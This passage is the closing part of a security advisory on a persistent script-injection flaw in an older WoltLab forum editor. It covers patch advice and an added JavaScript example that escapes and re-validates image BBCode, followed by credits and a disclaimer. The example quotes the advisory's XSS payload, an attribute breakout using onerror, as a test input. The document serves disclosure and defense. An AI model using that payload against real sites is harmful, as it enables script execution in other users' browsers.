../Reply - direct execute test 1 - TalkBox #337 - VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM.htm
../Edit post - test 1 - TalkBox #337 - VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM.htm
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the
`mce_editor_0_codeview` module context on reverse requests through quote,
multiquote or edit post.
An upgrade of v3.9.1 pl1 to v4.x fully solves the editor issues. Also update
the com.woltlab.wcf.form.message.wysiwyg editor core components to prevent the
issue.
Version 4.x is not affected by the vulnerability and already has upgraded
components which prevent execution of script code in the editor.
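The Technical Details section above describes the failure: the editor rebuilds
BBCode from the rendered post (the "reverse encoding" on quote/edit) and splices
the image URL back into markup without re-escaping it. The following is an added
example, not WoltLab code and not part of the advisory, showing the
defensive shape the Solution section asks for: an [img] round-trip in which the
URL is treated as data in both directions. The validation pattern `^[^?\s]+$`
is the one the page's editor config declares for [img]; the http(s)
scheme allow-list, the quote/bracket rejection and all function names are
assumptions made for this example. The hostile inputs are constructed from the
PoC quoted earlier in this advisory.

```javascript
// Added example (not WoltLab code): a hardened [img] BBCode round-trip.
// The rendered HTML is regenerated from BBCode with escaping, and the
// reverse step (HTML -> BBCode) parses the src attribute, decodes it and
// re-validates it instead of splicing it into the editor content raw.

// Escape the five characters that can break out of HTML text or attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Exact inverse of escapeHtml; &amp; is decoded last so "&amp;lt;" stays "&lt;".
function unescapeHtml(value) {
  return String(value)
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&amp;/g, '&');
}

// The page's editor config declares validationPattern '^[^?\s]+$' for [img].
// That alone still accepts javascript: and quote characters, so this check
// (an assumption for this example) also requires an http(s) scheme and
// rejects anything that could terminate an attribute value.
const IMG_URL_PATTERN = /^[^?\s]+$/;
function isSafeImageUrl(url) {
  if (typeof url !== 'string' || !IMG_URL_PATTERN.test(url)) return false;
  if (/[<>"'\\]/.test(url)) return false;
  return /^https?:\/\//i.test(url);
}

// BBCode -> HTML. Every [img] whose URL fails validation, and all other
// text, is emitted HTML-escaped, so post content never reaches the DOM raw.
function renderImgBBCode(bbcode) {
  return String(bbcode)
    .split(/(\[img\][\s\S]*?\[\/img\])/)
    .map(function (part) {
      const m = /^\[img\]([\s\S]*?)\[\/img\]$/.exec(part);
      if (m && isSafeImageUrl(m[1])) {
        return '<img src="' + escapeHtml(m[1]) + '" class="resizeImage" alt="" />';
      }
      return escapeHtml(part);
    })
    .join('');
}

// HTML -> BBCode (the "reverse encoding" the editor performs on quote/edit).
// The src value is read as an attribute, decoded, and re-validated; a value
// that would not have been accepted on the way in is dropped, not spliced.
function reverseEncodeImg(html) {
  return String(html)
    .split(/(<img\b[^>]*>)/)
    .map(function (part) {
      if (/^<img\b/.test(part)) {
        const src = /\ssrc="([^"]*)"/.exec(part);
        const url = src ? unescapeHtml(src[1]) : '';
        return isSafeImageUrl(url) ? '[img]' + url + '[/img]' : '';
      }
      return unescapeHtml(part);
    })
    .join('');
}

// Constructed inputs: one legitimate image and the attribute-breakout payload
// quoted in the advisory's PoC section.
const GOOD_POST = '[img]http://example.test/x.png[/img]';
const POC_POST = '"><img onerror=prompt(/POC/) src=x></img>';

function demo() {
  return {
    renderedPoc: renderImgBBCode(POC_POST),
    roundTrip: reverseEncodeImg(renderImgBBCode(GOOD_POST))
  };
}

console.log(demo());
```

The property worth checking in a real editor is the same one `demo()` exercises: rendering a post, reverse-encoding it and rendering it again must never yield a tag or attribute that did not come from validated BBCode, and the hostile PoC text must survive only as escaped text.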
Security Risk:
==============
The security risk of the persistent validation vulnerability and encoding
filter issue in the editor is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@xxxxxxxxxxxxxxxxx)
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx - research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or
research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx